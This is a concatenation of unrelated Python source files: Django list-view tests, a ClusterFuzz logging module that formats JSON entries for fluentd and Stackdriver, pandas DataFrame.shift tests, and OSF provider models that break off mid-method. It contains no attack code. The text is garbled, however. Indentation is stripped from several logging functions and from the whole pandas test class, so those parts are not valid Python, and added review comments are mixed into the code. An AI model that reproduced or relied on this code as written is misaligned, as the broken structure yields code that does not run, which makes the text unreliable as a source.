        self.assertIs(res.context['artist_list'], res.context['object_list'])
        self.assertIsNone(res.context['paginator'])
        self.assertIsNone(res.context['page_obj'])
        self.assertFalse(res.context['is_paginated'])
    def test_allow_empty_false(self):
        res = self.client.get('/list/authors/notempty/')
        self.assertEqual(res.status_code, 200)
        Author.objects.all().delete()
        # With allow_empty=False an empty queryset yields a 404.
        res = self.client.get('/list/authors/notempty/')
        self.assertEqual(res.status_code, 404)
    def test_template_name(self):
        res = self.client.get('/list/authors/template_name/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertTemplateUsed(res, 'generic_views/list.html')
    def test_template_name_suffix(self):
        res = self.client.get('/list/authors/template_name_suffix/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertTemplateUsed(res, 'generic_views/author_objects.html')
    def test_context_object_name(self):
        res = self.client.get('/list/authors/context_object_name/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
        self.assertNotIn('authors', res.context)
        self.assertIs(res.context['author_list'], res.context['object_list'])
        self.assertTemplateUsed(res, 'generic_views/author_list.html')
    def test_duplicate_context_object_name(self):
        res = self.client.get('/list/authors/dupe_context_object_name/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
        self.assertNotIn('authors', res.context)
        self.assertNotIn('author_list', res.context)
        self.assertTemplateUsed(res, 'generic_views/author_list.html')
    def test_missing_items(self):
        self.assertRaises(ImproperlyConfigured, self.client.get, '/list/authors/invalid/')
    def test_paginated_list_view_does_not_load_entire_table(self):
        # Regression test for #17535
        self._make_authors(3)
        # 1 query for authors
        with self.assertNumQueries(1):
            self.client.get('/list/authors/notempty/')
        # same as above + 1 query to test if authors exist + 1 query for pagination
        with self.assertNumQueries(3):
            self.client.get('/list/authors/notempty/paginated/')
    @override_settings(DEBUG=True)
    def test_paginated_list_view_returns_useful_message_on_invalid_page(self):
        # test for #19240
        # tests that source exception's message is included in page
        self._make_authors(1)
        res = self.client.get('/list/authors/paginated/2/')
        self.assertEqual(res.status_code, 404)
        self.assertEqual(force_str(res.context.get('reason')),
                         "Invalid page (2): That page contains no results")
    def _make_authors(self, n):
        # Helper: reset the Author table to exactly `n` zero-padded rows.
        Author.objects.all().delete()
        for i in range(n):
            Author.objects.create(name='Author %02i' % i, slug='a%s' % i)
| |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Logging functions."""
import datetime
import json
import logging
import logging.handlers
from logging import config
import os
import sys
import time
import traceback
from typing import Any
# Truncation limit for messages sent to Stackdriver (see format_record()).
STACKDRIVER_LOG_MESSAGE_LIMIT = 80000  # Allowed log entry size is 100 KB.
# Truncation limit for messages written via the local logger (see emit()).
LOCAL_LOG_MESSAGE_LIMIT = 100000
# maxBytes for the rotating local log files (see get_handler_config()).
LOCAL_LOG_LIMIT = 500000
# Module-wide logger instance, installed via set_logger()/configure().
_logger = None
# Re-entrancy guard for uncaught_exception_handler().
_is_already_handling_uncaught = False
# Extras merged into every emitted entry; populated by configure().
_default_extras = {}
def _increment_error_count():
  """Increment the error count metric."""
  # Fixed: the docstring previously began with four quote characters
  # (`""""Increment...`), leaving a stray '"' in the docstring text.
  if _is_running_on_app_engine():
    task_name = 'appengine'
  else:
    task_name = os.getenv('TASK_NAME', 'unknown')
  # NOTE(review): deferred import kept as in the original -- presumably to
  # avoid a circular import; confirm before hoisting to module scope.
  from clusterfuzz._internal.metrics import monitoring_metrics
  monitoring_metrics.LOG_ERROR_COUNT.increment({'task_name': task_name})
def _is_local():
"""Return whether or not in a local development environment."""
return (bool(os.getenv('LOCAL_DEVELOPMENT')) or
os.getenv('SERVER_SOFTWARE', '').startswith('Development/'))
def _is_running_on_app_engine():
"""Return whether or not we're running on App Engine (production or
development)."""
return os.getenv('GAE_ENV') or (
os.getenv('SERVER_SOFTWARE') and
(os.getenv('SERVER_SOFTWARE').startswith('Development/') or
os.getenv('SERVER_SOFTWARE').startswith('Google App Engine/')))
def _console_logging_enabled():
"""Return bool on where console logging is enabled, usually for tests and
reproduce tool."""
return bool(os.getenv('LOG_TO_CONSOLE'))
def suppress_unwanted_warnings():
  """Suppress unwanted warnings."""
  # The discovery-cache logger is noisy on import; see
  # https://github.com/googleapis/google-api-python-client/issues/299
  noisy_logger = logging.getLogger('googleapiclient.discovery_cache')
  noisy_logger.setLevel(logging.ERROR)
def set_logger(logger):
  """Set the logger."""
  # Replaces the module-wide logger returned by get_logger().
  global _logger
  _logger = logger
def get_handler_config(filename, backup_count):
  """Build a RotatingFileHandler config for `filename` (relative to ROOT_DIR)
  keeping `backup_count` rotated files."""
  log_path = os.path.join(os.getenv('ROOT_DIR'), filename)
  # Local runs get unbounded files: maxBytes=0 disables size-based rollover.
  size_limit = 0 if _is_local() else LOCAL_LOG_LIMIT
  return {
      'class': 'logging.handlers.RotatingFileHandler',
      'level': logging.INFO,
      'formatter': 'simple',
      'filename': log_path,
      'maxBytes': size_limit,
      'backupCount': backup_count,
      'encoding': 'utf8',
  }
def get_logging_config_dict(name):
  """Get config dict for the logger `name`."""
  # File handler parameters per logger name: (relative path, backup count).
  file_handler_params = {
      'run_bot': ('bot/logs/bot.log', 3),
      'run': ('bot/logs/run.log', 1),
      'run_heartbeat': ('bot/logs/run_heartbeat.log', 1),
      'heartbeat': ('bot/logs/heartbeat.log', 1),
      'run_fuzzer': ('bot/logs/run_fuzzer.log', 1),
      'run_testcase': ('bot/logs/run_testcase.log', 1),
      'android_heartbeat': ('bot/logs/android_heartbeat.log', 1),
  }
  log_file, backups = file_handler_params[name]
  return {
      'version': 1,
      'disable_existing_loggers': False,
      'formatters': {
          'simple': {
              'format': '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
          }
      },
      'handlers': {
          'handler': get_handler_config(log_file, backups),
          'fluentd': {
              'class': 'clusterfuzz._internal.metrics.logs.JsonSocketHandler',
              'level': logging.INFO,
              'host': '127.0.0.1',
              'port': 5170,
          }
      },
      'loggers': {
          name: {
              'handlers': ['handler']
          }
      },
      # Everything propagating to the root logger is shipped to fluentd.
      'root': {
          'level': logging.INFO,
          'handlers': ['fluentd']
      }
  }
def truncate(msg, limit):
  """Shorten `msg` by cutting out its middle when it exceeds `limit`."""
  if len(msg) <= limit:
    return msg
  half = limit // 2
  omitted = '...%d characters truncated...' % (len(msg) - limit)
  # Keep the head and tail halves, joined around the truncation marker.
  return '\n'.join([msg[:half], omitted, msg[-half:]])
def format_record(record: logging.LogRecord) -> str:
  """Format LogEntry into JSON string."""
  entry = {
      'message':
          truncate(record.getMessage(), STACKDRIVER_LOG_MESSAGE_LIMIT),
      # NOTE(review): utcfromtimestamp is deprecated since Python 3.12;
      # consider datetime.datetime.fromtimestamp(..., tz=timezone.utc).
      'created': (
          datetime.datetime.utcfromtimestamp(record.created).isoformat() + 'Z'),
      'severity':
          record.levelname,
      'bot_name':
          os.getenv('BOT_NAME'),
      'task_payload':
          os.getenv('TASK_PAYLOAD'),
      'name':
          record.name,
  }
  # 'location' and 'extras' are injected by emit() via the `extra` kwarg;
  # fall back gracefully when the record came from elsewhere.
  entry['location'] = getattr(record, 'location', {'error': True})
  entry['extras'] = getattr(record, 'extras', {})
  update_entry_with_exc(entry, record.exc_info)
  # Drop the key entirely rather than sending an empty dict.
  if not entry['extras']:
    del entry['extras']
  worker_bot_name = os.environ.get('WORKER_BOT_NAME')
  if worker_bot_name:
    entry['worker_bot_name'] = worker_bot_name
  fuzz_target = os.getenv('FUZZ_TARGET')
  if fuzz_target:
    entry['fuzz_target'] = fuzz_target
  # Log bot shutdown cases as WARNINGs since this is expected for preemptibles.
  if (entry['severity'] in ['ERROR', 'CRITICAL'] and
      'IOError: [Errno 4] Interrupted function call' in entry['message']):
    entry['severity'] = 'WARNING'
  return json.dumps(entry, default=_handle_unserializable)
def _handle_unserializable(unserializable: Any) -> str:
try:
return str(unserializable, 'utf-8')
except TypeError:
return str(unserializable)
def update_entry_with_exc(entry, exc_info):
  """Update the dict `entry` in place with exception data from `exc_info`."""
  if not exc_info:
    return
  exc_type, error, tb = exc_info
  error_extras = getattr(error, 'extras', {})
  # Prefer an existing task_payload; otherwise take (and remove) the one
  # attached to the error itself.
  entry['task_payload'] = (
      entry.get('task_payload') or error_extras.pop('task_payload', None))
  entry['extras'].update(error_extras)
  entry['serviceContext'] = {'service': 'bots'}
  # Reference:
  # https://cloud.google.com/error-reporting/docs/formatting-error-messages,
  if not exc_type:
    # If we log error without exception, we need to set
    # `context.reportLocation`.
    location = entry.get('location', {})
    entry['context'] = {
        'reportLocation': {
            'filePath': location.get('path', ''),
            'lineNumber': location.get('line', 0),
            'functionName': location.get('method', '')
        }
    }
    return
  # With an exception, the formatted traceback must go into `message`.
  entry['message'] += '\n' + ''.join(
      traceback.format_exception(exc_type, error, tb))
class JsonSocketHandler(logging.handlers.SocketHandler):
  """Format log into JSON string before sending it to fluentd. We need this
  because SocketHandler doesn't respect the formatter attribute.

  NOTE(review): this references the ``logging.handlers`` submodule; verify
  it is explicitly imported at module scope (``from logging import config``
  alone only loads it as a side effect).
  """
  def makePickle(self, record: logging.LogRecord):
    """Format LogEntry into JSON string."""
    # \n is the recognized delimiter by fluentd's in_tcp. Don't remove.
    return (format_record(record) + '\n').encode('utf-8')
def uncaught_exception_handler(exception_type, exception_value,
                               exception_traceback):
  """Handles any exception that are uncaught by logging an error and calling
  the sys.__excepthook__."""
  # Ensure that we are not calling ourself. This shouldn't be needed since we
  # are using sys.__excepthook__. Do this check anyway since if we are somehow
  # calling ourself we might infinitely send errors to the logs, which would be
  # quite bad.
  # NOTE(review): _is_already_handling_uncaught is never reset, so a second
  # uncaught exception in this process raises immediately -- confirm intended.
  global _is_already_handling_uncaught
  if _is_already_handling_uncaught:
    raise Exception('Loop in uncaught_exception_handler')
  _is_already_handling_uncaught = True
  # Use emit since log_error needs sys.exc_info() to return this function's
  # arguments to call init properly.
  # Don't worry about emit() throwing an Exception, python will let us know
  # about that exception as well as the original one.
  emit(
      logging.ERROR,
      'Uncaught exception',
      exc_info=(exception_type, exception_value, exception_traceback))
  sys.__excepthook__(exception_type, exception_value, exception_traceback)
def configure_appengine():
  """Configure logging for App Engine."""
  logging.getLogger().setLevel(logging.INFO)
  # Local development and unit tests keep the plain root logger.
  if os.getenv('LOCAL_DEVELOPMENT') or os.getenv('PY_UNITTESTS'):
    return
  # NOTE(review): imported lazily -- presumably the cloud logging client is
  # only available in production App Engine environments; confirm.
  import google.cloud.logging
  client = google.cloud.logging.Client()
  handler = client.get_default_handler()
  logging.getLogger().addHandler(handler)
def configure(name, extras=None):
  """Set logger. See the list of loggers in bot/config/logging.yaml.
  Also configures the process to log any uncaught exceptions as an error.
  |extras| will be included by emit() in log messages."""
  suppress_unwanted_warnings()
  if _is_running_on_app_engine():
    configure_appengine()
    return
  # Console logging (tests/reproduce tool) gets a basic config; otherwise
  # install the file + fluentd handlers for this logger name.
  if _console_logging_enabled():
    logging.basicConfig()
  else:
    config.dictConfig(get_logging_config_dict(name))
  logger = logging.getLogger(name)
  logger.setLevel(logging.INFO)
  set_logger(logger)
  # Set _default_extras so they can be used later.
  if extras is None:
    extras = {}
  global _default_extras
  _default_extras = extras
  # Install an exception handler that will log an error when there is an
  # uncaught exception.
  sys.excepthook = uncaught_exception_handler
def get_logger():
  """Return the module logger, lazily initializing one where possible.
  Exists as a function so tests can mock the logger."""
  if not _logger:
    if _is_running_on_app_engine():
      # Running on App Engine.
      set_logger(logging.getLogger())
    elif _console_logging_enabled():
      # Force a logger when console logging is enabled.
      configure('root')
  return _logger
def get_source_location():
  """Return the caller file, lineno, and funcName."""
  try:
    raise Exception()
  except:
    # f_back skips this function's own frame; the loop then walks past any
    # frames that live in logs.py (e.g. emit()) to reach the real caller.
    # The code is adapted from:
    # https://github.com/python/cpython/blob/2.7/Lib/logging/__init__.py#L1244
    frame = sys.exc_info()[2].tb_frame.f_back
    while frame and hasattr(frame, 'f_code'):
      code = frame.f_code
      if not code.co_filename.endswith('logs.py'):
        return code.co_filename, frame.f_lineno, code.co_name
      frame = frame.f_back
  return 'Unknown', '-1', 'Unknown'
def _add_appengine_trace(extras):
  """Add App Engine tracing information."""
  if not _is_running_on_app_engine():
    return
  from libs import auth
  try:
    request = auth.get_current_request()
    if not request:
      return
  except Exception:
    # FIXME: Find a way to add traces in threads. Skip adding for now, as
    # otherwise, we hit an exception "Request global variable is not set".
    return
  trace_header = request.headers.get('X-Cloud-Trace-Context')
  if not trace_header:
    return
  # The trace context header is "TRACE_ID/SPAN_ID;o=..."; only the trace id
  # part before the first '/' is used here.
  project_id = os.getenv('APPLICATION_ID')
  trace_id = trace_header.split('/')[0]
  extras['logging.googleapis.com/trace'] = (
      'projects/{project_id}/traces/{trace_id}').format(
          project_id=project_id, trace_id=trace_id)
def emit(level, message, exc_info=None, **extras):
  """Log `message` at `level` in JSON form.

  `extras` are merged over `_default_extras` and attached to the record so
  format_record() can serialize them under the 'extras' key."""
  logger = get_logger()
  if not logger:
    return
  # Include extras passed as an argument and default extras.
  all_extras = _default_extras.copy()
  all_extras.update(extras)
  path_name, line_number, method_name = get_source_location()
  if _is_running_on_app_engine():
    if exc_info == (None, None, None):
      # Don't pass exc_info at all, as otherwise cloud logging will append
      # "NoneType: None" to the message.
      exc_info = None
    if level >= logging.ERROR:
      # App Engine only reports errors if there is an exception stacktrace, so
      # we generate one. We don't create an exception here and then format it,
      # as that will not include frames below this emit() call. We do [:-2] on
      # the stacktrace to exclude emit() and the logging function below it (e.g.
      # log_error).
      message = (
          message + '\n' + 'Traceback (most recent call last):\n' + ''.join(
              traceback.format_stack()[:-2]) + 'LogError: ' + message)
    _add_appengine_trace(all_extras)
  # We need to make a dict out of it because member of the dict becomes the
  # first class attributes of LogEntry. It is very tricky to identify the extra
  # attributes. Therefore, we wrap extra fields under the attribute 'extras'.
  logger.log(
      level,
      truncate(message, LOCAL_LOG_MESSAGE_LIMIT),
      exc_info=exc_info,
      extra={
          'extras': all_extras,
          'location': {
              'path': path_name,
              'line': line_number,
              'method': method_name
          }
      })
def log(message, level=logging.INFO, **extras):
  """Logs `message` at `level` (INFO by default), forwarding `extras`."""
  emit(level, message, **extras)
def log_warn(message, **extras):
  """Logs the warning message."""
  # sys.exc_info() is (None, None, None) outside an except block, so the
  # traceback is attached only when a warning is logged during handling.
  emit(logging.WARN, message, exc_info=sys.exc_info(), **extras)
def log_error(message, **extras):
  """Logs the error in the error log file."""
  exception = extras.pop('exception', None)
  if not exception:
    emit(logging.ERROR, message, exc_info=sys.exc_info(), **extras)
  else:
    # Raise the supplied exception so that sys.exc_info() points at it
    # when the entry is emitted.
    try:
      raise exception
    except:
      emit(logging.ERROR, message, exc_info=sys.exc_info(), **extras)
  _increment_error_count()
def log_fatal_and_exit(message, **extras):
  """Logs a fatal error, optionally waits, then terminates the process."""
  delay = extras.pop('wait_before_exit', None)
  emit(logging.CRITICAL, message, exc_info=sys.exc_info(), **extras)
  _increment_error_count()
  if delay:
    log('Waiting for %d seconds before exit.' % delay)
    time.sleep(delay)
  sys.exit(-1)
| |
import numpy as np
import pytest
import pandas.util._test_decorators as td
import pandas as pd
from pandas import (
CategoricalIndex,
DataFrame,
Index,
Series,
date_range,
offsets,
)
import pandas._testing as tm
class TestDataFrameShift:
def test_shift(self, datetime_frame, int_frame):
# naive shift
shiftedFrame = datetime_frame.shift(5)
tm.assert_index_equal(shiftedFrame.index, datetime_frame.index)
shiftedSeries = datetime_frame["A"].shift(5)
tm.assert_series_equal(shiftedFrame["A"], shiftedSeries)
shiftedFrame = datetime_frame.shift(-5)
tm.assert_index_equal(shiftedFrame.index, datetime_frame.index)
shiftedSeries = datetime_frame["A"].shift(-5)
tm.assert_series_equal(shiftedFrame["A"], shiftedSeries)
# shift by 0
unshifted = datetime_frame.shift(0)
tm.assert_frame_equal(unshifted, datetime_frame)
# shift by DateOffset
shiftedFrame = datetime_frame.shift(5, freq=offsets.BDay())
assert len(shiftedFrame) == len(datetime_frame)
shiftedFrame2 = datetime_frame.shift(5, freq="B")
tm.assert_frame_equal(shiftedFrame, shiftedFrame2)
d = datetime_frame.index[0]
shifted_d = d + offsets.BDay(5)
tm.assert_series_equal(
datetime_frame.xs(d), shiftedFrame.xs(shifted_d), check_names=False
)
# shift int frame
int_shifted = int_frame.shift(1) # noqa
# Shifting with PeriodIndex
ps = tm.makePeriodFrame()
shifted = ps.shift(1)
unshifted = shifted.shift(-1)
tm.assert_index_equal(shifted.index, ps.index)
tm.assert_index_equal(unshifted.index, ps.index)
tm.assert_numpy_array_equal(
unshifted.iloc[:, 0].dropna().values, ps.iloc[:-1, 0].values
)
shifted2 = ps.shift(1, "B")
shifted3 = ps.shift(1, offsets.BDay())
tm.assert_frame_equal(shifted2, shifted3)
tm.assert_frame_equal(ps, shifted2.shift(-1, "B"))
msg = "does not match PeriodIndex freq"
with pytest.raises(ValueError, match=msg):
ps.shift(freq="D")
# shift other axis
# GH#6371
df = DataFrame(np.random.rand(10, 5))
expected = pd.concat(
[DataFrame(np.nan, index=df.index, columns=[0]), df.iloc[:, 0:-1]],
ignore_index=True,
axis=1,
)
result = df.shift(1, axis=1)
tm.assert_frame_equal(result, expected)
# shift named axis
df = DataFrame(np.random.rand(10, 5))
expected = pd.concat(
[DataFrame(np.nan, index=df.index, columns=[0]), df.iloc[:, 0:-1]],
ignore_index=True,
axis=1,
)
result = df.shift(1, axis="columns")
tm.assert_frame_equal(result, expected)
def test_shift_bool(self):
df = DataFrame({"high": [True, False], "low": [False, False]})
rs = df.shift(1)
xp = DataFrame(
np.array([[np.nan, np.nan], [True, False]], dtype=object),
columns=["high", "low"],
)
tm.assert_frame_equal(rs, xp)
def test_shift_categorical(self):
# GH#9416
s1 = Series(["a", "b", "c"], dtype="category")
s2 = Series(["A", "B", "C"], dtype="category")
df = DataFrame({"one": s1, "two": s2})
rs = df.shift(1)
xp = DataFrame({"one": s1.shift(1), "two": s2.shift(1)})
tm.assert_frame_equal(rs, xp)
def test_shift_fill_value(self):
# GH#24128
df = DataFrame(
[1, 2, 3, 4, 5], index=date_range("1/1/2000", periods=5, freq="H")
)
exp = DataFrame(
[0, 1, 2, 3, 4], index=date_range("1/1/2000", periods=5, freq="H")
)
result = df.shift(1, fill_value=0)
tm.assert_frame_equal(result, exp)
exp = DataFrame(
[0, 0, 1, 2, 3], index=date_range("1/1/2000", periods=5, freq="H")
)
result = df.shift(2, fill_value=0)
tm.assert_frame_equal(result, exp)
def test_shift_empty(self):
# Regression test for GH#8019
df = DataFrame({"foo": []})
rs = df.shift(-1)
tm.assert_frame_equal(df, rs)
def test_shift_duplicate_columns(self):
# GH#9092; verify that position-based shifting works
# in the presence of duplicate columns
column_lists = [list(range(5)), [1] * 5, [1, 1, 2, 2, 1]]
data = np.random.randn(20, 5)
shifted = []
for columns in column_lists:
df = DataFrame(data.copy(), columns=columns)
for s in range(5):
df.iloc[:, s] = df.iloc[:, s].shift(s + 1)
df.columns = range(5)
shifted.append(df)
# sanity check the base case
nulls = shifted[0].isna().sum()
tm.assert_series_equal(nulls, Series(range(1, 6), dtype="int64"))
# check all answers are the same
tm.assert_frame_equal(shifted[0], shifted[1])
tm.assert_frame_equal(shifted[0], shifted[2])
def test_shift_axis1_multiple_blocks(self, using_array_manager):
# GH#35488
df1 = DataFrame(np.random.randint(1000, size=(5, 3)))
df2 = DataFrame(np.random.randint(1000, size=(5, 2)))
df3 = pd.concat([df1, df2], axis=1)
if not using_array_manager:
assert len(df3._mgr.blocks) == 2
result = df3.shift(2, axis=1)
expected = df3.take([-1, -1, 0, 1, 2], axis=1)
expected.iloc[:, :2] = np.nan
expected.columns = df3.columns
tm.assert_frame_equal(result, expected)
# Case with periods < 0
# rebuild df3 because `take` call above consolidated
df3 = pd.concat([df1, df2], axis=1)
if not using_array_manager:
assert len(df3._mgr.blocks) == 2
result = df3.shift(-2, axis=1)
expected = df3.take([2, 3, 4, -1, -1], axis=1)
expected.iloc[:, -2:] = np.nan
expected.columns = df3.columns
tm.assert_frame_equal(result, expected)
@pytest.mark.filterwarnings("ignore:tshift is deprecated:FutureWarning")
def test_tshift(self, datetime_frame):
# TODO: remove this test when tshift deprecation is enforced
# PeriodIndex
ps = tm.makePeriodFrame()
shifted = ps.tshift(1)
unshifted = shifted.tshift(-1)
tm.assert_frame_equal(unshifted, ps)
shifted2 = ps.tshift(freq="B")
tm.assert_frame_equal(shifted, shifted2)
shifted3 = ps.tshift(freq=offsets.BDay())
tm.assert_frame_equal(shifted, shifted3)
msg = "Given freq M does not match PeriodIndex freq B"
with pytest.raises(ValueError, match=msg):
ps.tshift(freq="M")
# DatetimeIndex
shifted = datetime_frame.tshift(1)
unshifted = shifted.tshift(-1)
tm.assert_frame_equal(datetime_frame, unshifted)
shifted2 = datetime_frame.tshift(freq=datetime_frame.index.freq)
tm.assert_frame_equal(shifted, shifted2)
inferred_ts = DataFrame(
datetime_frame.values,
Index(np.asarray(datetime_frame.index)),
columns=datetime_frame.columns,
)
shifted = inferred_ts.tshift(1)
expected = datetime_frame.tshift(1)
expected.index = expected.index._with_freq(None)
tm.assert_frame_equal(shifted, expected)
unshifted = shifted.tshift(-1)
tm.assert_frame_equal(unshifted, inferred_ts)
no_freq = datetime_frame.iloc[[0, 5, 7], :]
msg = "Freq was not set in the index hence cannot be inferred"
with pytest.raises(ValueError, match=msg):
no_freq.tshift()
def test_tshift_deprecated(self, datetime_frame):
# GH#11631
with tm.assert_produces_warning(FutureWarning):
datetime_frame.tshift()
def test_period_index_frame_shift_with_freq(self):
ps = tm.makePeriodFrame()
shifted = ps.shift(1, freq="infer")
unshifted = shifted.shift(-1, freq="infer")
tm.assert_frame_equal(unshifted, ps)
shifted2 = ps.shift(freq="B")
tm.assert_frame_equal(shifted, shifted2)
shifted3 = ps.shift(freq=offsets.BDay())
tm.assert_frame_equal(shifted, shifted3)
def test_datetime_frame_shift_with_freq(self, datetime_frame):
shifted = datetime_frame.shift(1, freq="infer")
unshifted = shifted.shift(-1, freq="infer")
tm.assert_frame_equal(datetime_frame, unshifted)
shifted2 = datetime_frame.shift(freq=datetime_frame.index.freq)
tm.assert_frame_equal(shifted, shifted2)
inferred_ts = DataFrame(
datetime_frame.values,
Index(np.asarray(datetime_frame.index)),
columns=datetime_frame.columns,
)
shifted = inferred_ts.shift(1, freq="infer")
expected = datetime_frame.shift(1, freq="infer")
expected.index = expected.index._with_freq(None)
tm.assert_frame_equal(shifted, expected)
unshifted = shifted.shift(-1, freq="infer")
tm.assert_frame_equal(unshifted, inferred_ts)
def test_period_index_frame_shift_with_freq_error(self):
ps = tm.makePeriodFrame()
msg = "Given freq M does not match PeriodIndex freq B"
with pytest.raises(ValueError, match=msg):
ps.shift(freq="M")
def test_datetime_frame_shift_with_freq_error(self, datetime_frame):
no_freq = datetime_frame.iloc[[0, 5, 7], :]
msg = "Freq was not set in the index hence cannot be inferred"
with pytest.raises(ValueError, match=msg):
no_freq.shift(freq="infer")
    @td.skip_array_manager_not_yet_implemented  # TODO(ArrayManager) axis=1 support
    def test_shift_dt64values_int_fill_deprecated(self):
        # GH#31971
        # Filling shifted datetime64 values with an integer is deprecated:
        # the int is cast to Timestamp and a FutureWarning is emitted.
        ser = Series([pd.Timestamp("2020-01-01"), pd.Timestamp("2020-01-02")])
        df = ser.to_frame()
        with tm.assert_produces_warning(FutureWarning):
            result = df.shift(1, fill_value=0)
        expected = Series([pd.Timestamp(0), ser[0]]).to_frame()
        tm.assert_frame_equal(result, expected)
        # axis = 1
        # Consolidate first so the axis=1 shift exercises the single-block path.
        df2 = DataFrame({"A": ser, "B": ser})
        df2._consolidate_inplace()
        with tm.assert_produces_warning(FutureWarning):
            result = df2.shift(1, axis=1, fill_value=0)
        expected = DataFrame({"A": [pd.Timestamp(0), pd.Timestamp(0)], "B": df2["A"]})
        tm.assert_frame_equal(result, expected)
def test_shift_axis1_categorical_columns(self):
# GH#38434
ci = CategoricalIndex(["a", "b", "c"])
df = DataFrame(
{"a": [1, 3], "b": [2, 4], "c": [5, 6]}, index=ci[:-1], columns=ci
)
result = df.shift(axis=1)
expected = DataFrame(
{"a": [np.nan, np.nan], "b": [1, 3], "c": [2, 4]}, index=ci[:-1], columns=ci
)
tm.assert_frame_equal(result, expected)
# periods != 1
result = df.shift(2, axis=1)
expected = DataFrame(
{"a": [np.nan, np.nan], "b": [np.nan, np.nan], "c": [1, 3]},
index=ci[:-1],
columns=ci,
)
tm.assert_frame_equal(result, expected)
| |
# -*- coding: utf-8 -*-
from django.apps import apps
from django.contrib.postgres import fields
from typedmodels.models import TypedModel
from api.taxonomies.utils import optimize_subject_query
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from dirtyfields import DirtyFieldsMixin
from guardian.models import GroupObjectPermissionBase, UserObjectPermissionBase
from framework import sentry
from osf.models.base import BaseModel, TypedObjectIDMixin
from osf.models.licenses import NodeLicense
from osf.models.mixins import ReviewProviderMixin
from osf.models.storage import ProviderAssetFile
from osf.models.subject import Subject
from osf.models.notifications import NotificationSubscription
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
from osf.utils.fields import EncryptedTextField
from osf.utils.permissions import REVIEW_PERMISSIONS
from website import settings
from website.util import api_v2_url
from functools import reduce
class AbstractProvider(TypedModel, TypedObjectIDMixin, ReviewProviderMixin, DirtyFieldsMixin, BaseModel):
    """Base model for branded service providers.

    Concrete subclasses (preprint/collection/registration providers) share
    one table via django-typedmodels; ``(_id, type)`` is unique so the same
    short id may be reused across provider types.
    """
    class Meta:
        unique_together = ('_id', 'type')
        permissions = REVIEW_PERMISSIONS
    # Collection featured on the provider's landing page; set after creation
    # (see create_primary_collection_for_provider signal handler below).
    primary_collection = models.ForeignKey('Collection', related_name='+',
                                           null=True, blank=True, on_delete=models.SET_NULL)
    name = models.CharField(null=False, max_length=128)  # max length on prod: 22
    advisory_board = models.TextField(default='', blank=True)
    description = models.TextField(default='', blank=True)
    domain = models.URLField(blank=True, default='', max_length=200)
    domain_redirect_enabled = models.BooleanField(default=False)
    external_url = models.URLField(null=True, blank=True, max_length=200)  # max length on prod: 25
    email_contact = models.CharField(null=True, blank=True, max_length=200)  # max length on prod: 23
    email_support = models.CharField(null=True, blank=True, max_length=200)  # max length on prod: 23
    social_twitter = models.CharField(null=True, blank=True, max_length=200)  # max length on prod: 8
    social_facebook = models.CharField(null=True, blank=True, max_length=200)  # max length on prod: 8
    social_instagram = models.CharField(null=True, blank=True, max_length=200)  # max length on prod: 8
    footer_links = models.TextField(default='', blank=True)
    facebook_app_id = models.BigIntegerField(blank=True, null=True)
    example = models.CharField(null=True, blank=True, max_length=20)  # max length on prod: 5
    licenses_acceptable = models.ManyToManyField(NodeLicense, blank=True, related_name='licenses_acceptable')
    default_license = models.ForeignKey(NodeLicense, related_name='default_license',
                                        null=True, blank=True, on_delete=models.CASCADE)
    allow_submissions = models.BooleanField(default=True)
    allow_commenting = models.BooleanField(default=False)
    def __repr__(self):
        return ('(name={self.name!r}, default_license={self.default_license!r}, '
                'allow_submissions={self.allow_submissions!r}) with id {self.id!r}').format(self=self)
    def __unicode__(self):
        return '[{}] {} - {}'.format(self.readable_type, self.name, self.id)
    @property
    def all_subjects(self):
        # Providers without their own taxonomy fall back to the OSF-wide one.
        if self.subjects.exists():
            return self.subjects.all()
        return Subject.objects.filter(
            provider___id='osf',
            provider__type='osf.preprintprovider',
        )
    @property
    def has_highlighted_subjects(self):
        return self.subjects.filter(highlighted=True).exists()
    @property
    def highlighted_subjects(self):
        # Up to 10 subjects, alphabetical by text; falls back to top-level
        # subjects when none are explicitly highlighted.
        if self.has_highlighted_subjects:
            return self.subjects.filter(highlighted=True).order_by('text')[:10]
        else:
            return sorted(self.top_level_subjects, key=lambda s: s.text)[:10]
    @property
    def top_level_subjects(self):
        # Root subjects of this provider's taxonomy, or the OSF defaults.
        if self.subjects.exists():
            return optimize_subject_query(self.subjects.filter(parent__isnull=True))
        return optimize_subject_query(Subject.objects.filter(
            parent__isnull=True,
            provider___id='osf',
            provider__type='osf.preprintprovider',
        ))
    @property
    def readable_type(self):
        # Subclasses must supply a human-readable type label.
        raise NotImplementedError
    def get_asset_url(self, name):
        """ Helper that returns an associated ProviderAssetFile's url, or None
        :param str name: Name to perform lookup by
        :returns str|None: url of file
        """
        try:
            return self.asset_files.get(name=name).file.url
        except ProviderAssetFile.DoesNotExist:
            return None
class CollectionProvider(AbstractProvider):
    """Provider that brands and hosts collections."""
    class Meta:
        permissions = (
            # custom permissions for use in the OSF Admin App
            ('view_collectionprovider', 'Can view collection provider details'),
        )
    @property
    def readable_type(self):
        # Human-readable label used in logs and messages.
        return 'collection'
    def get_absolute_url(self):
        return self.absolute_api_v2_url
    @property
    def absolute_api_v2_url(self):
        # API v2 detail endpoint for this provider.
        path = '/providers/collections/{}/'.format(self._id)
        return api_v2_url(path)
class RegistrationProvider(AbstractProvider):
    """Provider that brands and hosts registrations."""
    class Meta:
        permissions = (
            # custom permissions for use in the OSF Admin App
            ('view_registrationprovider', 'Can view registration provider details'),
        )
    @property
    def readable_type(self):
        # Human-readable label used in logs and messages.
